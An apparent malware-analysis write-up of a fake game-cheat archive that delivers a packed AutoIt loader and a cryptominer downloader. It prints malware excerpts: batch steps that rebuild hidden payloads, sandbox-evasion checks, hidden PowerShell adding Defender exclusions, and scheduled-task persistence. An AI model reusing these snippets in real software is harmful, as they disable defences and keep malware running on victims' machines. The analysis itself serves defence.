11.03.2025

Ongoing series: #1 #2 #3

yet another youtube games cheat update

Another day, a few new channels, video uploads, and updates to malware download links later (not on Google, where the links remain online), a new version for deploying the final payload has appeared.

Laynch3r_Tool(v1.27).rar Archive

One of the new versions is the Laynch3r_Tool(v1.27).rar archive (SHA256: 512324DDA0B893CD2E61D7061BBB2A1832022F4D588B8B36D02062CF445416AC).

    Mode                 LastWriteTime         Length Name
    ----                 -------------         ------ ----
    d----          29/11/2024    15:03                apt
    d----          29/11/2024    15:04                binfmts
    d----          11/03/2025    17:33                gems
    d----          29/11/2024    15:07                ispell
    d----          01/09/2019    21:29                misc
    d----          29/11/2024    15:05                mlocate
    d----          29/11/2024    15:00                pam
    d----          29/11/2024    15:03                ucf
    d----          29/11/2024    14:59                usbutils
    -a---          11/04/2012    00:15        7174216 agcore1.dll
    -a---          11/03/2025    17:31      134217723 L__Tool.exe
    -a---          06/07/2023    09:01       25640324 plugins.tut
    -a---          24/01/2025    14:07       51278143 safes.tut
    -a---          12/06/2020    08:41        4982272 System.Windows.dll

None of the files except L__Tool.exe (SHA256: E10B8BA80EDBD15983D71E55B11C70466DDD65621A4CC6C774DDF1F68E2E16B5) have been changed. Everything else in the archive can therefore be considered filler material to evade antivirus scanners and will be disregarded. Only the executable will be examined in more detail below.

L__Tool.exe Binary

Due to the file size, the initial assumption was that it might be a bloated file. Accordingly, I attempted to use the debloat tool by Squiblydoo to remove any filler material. Instead, the tool conveniently indicated that this was an NSIS installer and extracted all associated files. The extracted setup.nsis file describes what the installer does once executed. Besides several commands meant solely for bloating and evading antivirus detection, it contains some critical actions. One key action is the extraction of various vsdx files from the installer (debloat did extract them too for easy analysis).

    4F EXTRACTFILE      $05000090, 'Smile.vsdx', $000E01E8, $FFFFFFFF, $FFFFFFFF, $FFFFFFD9
    62 ASSIGNVAR        5, ' expand Smile.vs', 0, 0
    73 ASSIGNVAR        4, 'x Smile.vsdx.bat', 0, 0
    78 SHELLEXEC        'open', '$SHELL:SYSDIR\\cmd.exe', '/c$V5d$V4 & Smile.vsdx.bat', 0, $0500, 'open $SHELL:SYSDIR\\cmd.exe'

Most of the files are not used (yet), with the only one being used in the script being Smile.vsdx (SHA256: E00561A394A08CE872FC8B24257DE445A5BB2BA2D91A6DB2005F27398B0761EC). Interestingly, this file is not actually a Visio file but an obfuscated batch script. Additionally, two variables (4 & 5) are assigned values that are later combined into a command by inserting the character d between them. This results in the final command being executed via cmd: expand Smile.vsdx Smile.vsdx.bat & Smile.vsdx.bat, which appends the .bat extension to the file and then runs the script.

Smile.vsdx.bat Script

In this obfuscated script, several commands are composed from variables and executed. For example, some parts of the archive file named Ebook.vsdx are extracted, which are then assembled into a binary called Monetary.com. This binary turns out to be the AutoIt v3 interpreter. Furthermore, other seemingly Visio files extracted by the installer are combined into an encrypted AutoIt script called D, located in the 802867 subfolder.

    extrac32 /Y /E Ebook.vsdx
    cmd /c copy /b 802867\Monetary.com + Concentrate + Tc + Emily + Mandate + Wp + Pb + Confirmation + Cruz + Did + Context 802867\Monetary.com
    cmd /c copy /b ..\Texts.vsdx + ..\Conservative.vsdx + ..\Ebony.vsdx + ..\Finds.vsdx + ..\Unit.vsdx + ..\Closer.vsdx + ..\Contractor.vsdx + ..\Literature.vsdx D
    start Monetary.com D

This AutoIt script (SHA256: C6376008DF4F0519E7C4D24F5FFAC73C21BA68816F98CC9F10393C7542D010D7) is then executed via start command and the Monetary.com binary. A very similar approach has been described by Trend Micro in their blog post.

D Encrypted AutoIt Script

Utilizing the myAut2Exe decompiler, I was able to revert this script to an au3 script and make it readable. This resulted in an obfuscated file with a lot of unnecessary filler loops and function calls.The core of the obfuscated code is an encryption function (FLYCHANGELOG) that is used hundreds of times throughout the script. Therefore, the first goal was to reverse this function, for further decrypting the script.

    FUNC FLYCHANGELOG($POSINGOLIVE,$CONTINUEDRACHEL)
        $MICROWAVERENEWABLE=""
        $SAYINGACKNOWLEDGE=CALL(STRINGREVERSE("tilpSgnirtS"),$POSINGOLIVE,"B",2)
        FOR $PANICPARTICULARLY=386-386 TO CALL("UBound",$SAYINGACKNOWLEDGE)-1
            $MICROWAVERENEWABLE&=CHRW($SAYINGACKNOWLEDGE[$PANICPARTICULARLY]-$CONTINUEDRACHEL)
            NEXT
        RETURN $MICROWAVERENEWABLE
    ENDFUNC

This is a simple function that splits every string passed to it at the character B and shifts it by a magic number. A simple reverse function in Python, along with a test value from the script, looks as follows:

    def decrypt(encrypted_input, magic_number):
        decrypted = ""
        encrypted = list(map(int, encrypted_input.split("B")))
        for character in encrypted:
            decrypted += chr(character - magic_number)
        return decrypted

    decoded_string = decrypt("104B123B115B111B114B117B104B117B49B104B123B104", 3)
    print(decoded_string) # explorer.exe

After decrypting the strings, further obfuscation methods are found (e.g., hundreds of while loops with switch-case statements) that attempt to hide the script’s contents. Among other things, the script checks the computer name and username and terminates under certain conditions (e.g., if the computer name is tz, NfZtFbPfH, or ELICZ, or if the username is test22 — some well known names of antivirus analysis hosts, as noted in this blog post by CrowdStrike).

    (CALL(EnvGet,COMPUTERNAME)=tz)(CALL(WinClose,CALL(AutoItWinGetTitle)))(OPT(TrayIconHide,1))
    (CALL(EnvGet,COMPUTERNAME)=NfZtFbPfH)(CALL(WinClose,CALL(AutoItWinGetTitle)))(OPT(TrayIconHide,1))
    (CALL(EnvGet,COMPUTERNAME)=ELICZ)(CALL(WinClose,CALL(AutoItWinGetTitle)))(OPT(TrayIconHide,1))
    (CALL(EnvGet,USERNAME)=test22)(CALL(WinClose,CALL(AutoItWinGetTitle)))(OPT(TrayIconHide,1))

Additionally, the system checks whether it is running on a 64-bit architecture and has the ability to load different binaries depending on the system type. In this case, only one binary (stored in the $SJUCASMNE variable) is available for 64-bit systems. It is decompressed and loaded using ntdll.dll. Overall, this is the result of packing the payload with the CypherIT Packer/Crypter.

Final Payload

As the final payload following the infostealer activities, a well-known miner downloader named Task32Main.exe is executed to prepare the system for further cryptomining. Within the .NET application, PowerShell is used to add various exclusions and to prevent the system from entering standby mode.

    string arguments = " /C powershell -EncodedCommand \"" + Convert.ToBase64String(Encoding.Unicode.GetBytes(string.Concat(new string[]
        {
            "<#",
            Fregat.RS(Fregat.rnd.Next(2, 12), true),
            "#> Add-MpPreference <#",
            Fregat.RS(Fregat.rnd.Next(2, 12), true),
            "#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#",
            Fregat.RS(Fregat.rnd.Next(2, 12), true),
            "#> -Force <#",
            Fregat.RS(Fregat.rnd.Next(2, 12), true),
            "#>"
        }))) + "\" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off";
        Process.Start(new ProcessStartInfo("cmd.exe")
        {
            Arguments = arguments,
            UseShellExecute = false,
            CreateNoWindow = true,
            WindowStyle = ProcessWindowStyle.Hidden,
            Verb = "runas"
        });

Additionally, this loader ensures persistence by creating scheduled tasks within the AutoStart function, which execute the corresponding files loaded through the DAF function.

    public static string string_2 = Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData) + "\\" + "Dllhost\\";
    processStartInfo.Arguments = string.Concat(new string[] {
        " /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN \"",
        "dllhost",
        "\" /TR \"",
        Fregat.string_2,
        "dllhost.exe\""
    });

    string[] array3 = new string[] {
        "NvStray"
    };
    processStartInfo.Arguments = string.Concat(new string[] {
        " /c SCHTASKS /CREATE /SC HOURLY /TN \"",
        "NvStray",
        "\\",
        "NvStray",
        "Service_bk",
        Convert.ToString(random.Next(10000)),
        "\" /TR \"",
        Fregat.string_2,
        "dllhost.exe\""
    });

Further details on this (well-known) approach and more in-depth descriptions of the miner watchdog can also be found in the blog post by Fortinet.